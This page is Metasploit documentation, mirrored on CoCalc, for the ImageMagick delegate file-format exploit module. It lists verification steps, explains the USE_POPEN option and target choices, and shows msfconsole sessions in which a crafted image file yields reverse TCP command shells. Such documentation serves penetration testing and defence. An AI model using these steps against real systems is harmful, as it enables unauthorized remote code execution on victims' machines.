CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/unix/fileformat/imagemagick_delegate.md
Views: 1904

Vulnerable Application

ImageMagick

Verification Steps

Example steps in this format:

  1. Install the ImageMagick

  2. Start msfconsole

  3. Do: use exploits/unix/fileformat/imagemagick_delegate

  4. Do: run

  5. convert msf.png msf.jpg

Options

USE_POPEN

When the default option true is used, targets 0 (SVG file) and 1 (MVG file) are valid When the option is set to false, target 2 (PS file) is valid

Scenarios

popen=true

msf exploit(imagemagick_delegate) > set target 0
msf exploit(imagemagick_delegate) > run

[*] Started reverse TCP handler on 1.1.1.1:4444
[+] msf.png stored at /Users/dmohanty/.msf4/local/msf.png
[*] Command shell session 1 opened (1.1.1.11:4444 -> 1.1.1.1:57212) at 2016-10-28 12:47:06 -0500

msf exploit(imagemagick_delegate) > set target 1
msf exploit(imagemagick_delegate) > run

[*] Started reverse TCP handler on 10.6.0.186:4444
[+] msf.png stored at /Users/dmohanty/.msf4/local/msf.png
[*] Command shell session 2 opened (1.1.1.1:4444 -> 1.1.1.1:64308) at 2016-10-28 15:48:40 -0500

popen=false

msf exploit(imagemagick_delegate) > set target 2
target => 2
msf exploit(imagemagick_delegate) > set USE_POPEN false
USE_POPEN => false
msf exploit(imagemagick_delegate) > run

[*] Started reverse TCP handler on 1.1.1.1:4444
[+] msf.png stored at /Users/dmohanty/.msf4/local/msf.png
[*] Command shell session 5 opened (1.1.1.1:4444 -> 1.1.1.1:64772) at 2016-10-28 15:58:03 -0500